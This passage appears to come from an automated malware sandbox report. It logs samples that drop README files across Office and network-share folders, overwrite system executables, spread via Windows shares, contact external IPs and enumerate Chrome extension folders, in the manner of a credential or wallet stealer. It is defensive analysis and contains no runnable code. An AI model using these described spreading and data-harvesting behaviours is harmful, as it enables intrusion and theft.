                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\el\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\en-us\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\es\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\et\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\eu\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\fi\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\fr\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\gl\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\he\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\hi\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\hr\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\hu\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\id\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\it\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ja\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\kk\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ko\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\lt\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\lv\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ms\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\nl\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\no\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\pl\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\pt\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\pt-BR\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ro\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ru\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\sk\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\sl\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\sr-Cyrl-BA\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\sr-Cyrl-RS\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\sr-Latn-RS\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\sv\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\th\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\tr\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\uk\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\vi\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\zh-CN\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\zh-TW\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ODBC Drivers\Salesforce\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\Updates\Apply\FilesInUse\AAD0B0DB-711A-45EF-A013-BDD28531EC08\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\OutlookReactNative\SearchView\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\Updates\Download\PackageFiles\AAD0B0DB-711A-45EF-A013-BDD28531EC08\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000002\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000006\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000011\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000018\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000027\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000042\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000043\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000049\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000050\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000051\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000054\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000055\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000058\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000062\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000063\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000064\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000068\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000069\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000070\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000072\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000076\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000079\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000083\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000084\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000087\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000088\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000098\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000099\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000101\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000104\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000105\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000106\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000107\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000108\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000109\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000113\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000117\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000118\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000119\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000120\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000122\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000123\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\fa000000124\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000125\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000128\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                          Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49756 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 116.203.10.31:443 -> 192.168.2.4:49764 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.35.43:443 -> 192.168.2.4:49977 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.4:49986 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.35.43:443 -> 192.168.2.4:49987 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.82.93:443 -> 192.168.2.4:50249 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.4:50256 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.35.43:443 -> 192.168.2.4:50257 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.35.43:443 -> 192.168.2.4:50273 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.35.43:443 -> 192.168.2.4:50294 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.35.43:443 -> 192.168.2.4:50323 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.35.43:443 -> 192.168.2.4:50345 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.4:50351 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:50358 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.4:50367 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.35.43:443 -> 192.168.2.4:50376 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.4:50382 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.35.43:443 -> 192.168.2.4:50384 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:50390 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 116.203.10.31:443 -> 192.168.2.4:50392 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.4:50396 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.4:50413 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50418 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50414 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50415 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50429 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50430 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.4:50448 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.4:50458 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:50467 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50470 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 151.101.129.91:443 -> 192.168.2.4:50471 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50475 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50476 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50477 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:50478 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50510 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50512 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50511 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50514 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50516 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50513 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50515 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50565 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50567 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50566 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50564 version: TLS 1.2
                          Source: Binary string: mozglue.pdbP source: b6866cbf49.exe, 0000001B.00000002.3396642326.000000006BD2D000.00000002.00000001.01000000.0000001D.sdmp
                          Source: Binary string: nss3.pdb@ source: b6866cbf49.exe, 0000001B.00000002.3403870715.000000006BEEF000.00000002.00000001.01000000.0000001C.sdmp
                          Source: Binary string: C:\Users\Administrator\Desktop\Cryptor2\Workspace\940993430\Project\Release\Project.pdb source: 6f9ea40b81.exe, 00000008.00000000.2413825497.0000000000F1C000.00000002.00000001.01000000.0000000A.sdmp, 6f9ea40b81.exe, 00000008.00000002.3715162072.0000000000F1C000.00000002.00000001.01000000.0000000A.sdmp
                          Source: Binary string: nss3.pdb source: b6866cbf49.exe, 0000001B.00000002.3403870715.000000006BEEF000.00000002.00000001.01000000.0000001C.sdmp
                          Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: fa1ce2a324.exe, 0000001D.00000003.2710807717.0000000004830000.00000004.00001000.00020000.00000000.sdmp, fa1ce2a324.exe, 0000001D.00000002.2890134171.0000000000B62000.00000040.00000001.01000000.00000014.sdmp
                          Source: Binary string: mozglue.pdb source: b6866cbf49.exe, 0000001B.00000002.3396642326.000000006BD2D000.00000002.00000001.01000000.0000001D.sdmp

                          Spreading

                          barindex
                          Infects executable files (exe, dll, sys, html)
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files\7-Zip\7-zip.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.Assembly.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPP.HTM
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files\7-Zip\7zFM.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3_x64.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files\7-Zip\7z.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files\7-Zip\7zG.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\AutoIt3\Uninstall.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files\7-Zip\7z.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files\7-Zip\7-zip32.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\Welcome.html
                          Spreads via windows shares (copies files to share folders)
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: Z:\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: Z:\Recovery\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: Z:\Recovery\WindowsRE\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_0040DE0C FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,7_2_0040DE0C
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00401825 FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindFirstFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindNextFileA,FindClose,7_2_00401825
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_0040CCF2 FindFirstFileA,FindFirstFileA,CopyFileA,CopyFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,FindNextFileA,FindClose,7_2_0040CCF2
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_0040B942 FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,DeleteFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,FindNextFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,7_2_0040B942
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_0040D820 FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindNextFileA,FindClose,7_2_0040D820
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B192FC GetProcessHeap,FindFirstFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,7_2_00B192FC
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B1AE0D SHGetFolderPathA,wsprintfA,FindFirstFileA,strcmp,strcmp,_mbscpy,_splitpath,_mbscpy,strlen,isupper,wsprintfA,_mbscpy,strlen,SHFileOperation,FindClose,7_2_00B1AE0D
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B1986A FindFirstFileA,StrCmpCA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,7_2_00B1986A
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B18952 FindFirstFileA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,7_2_00B18952
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
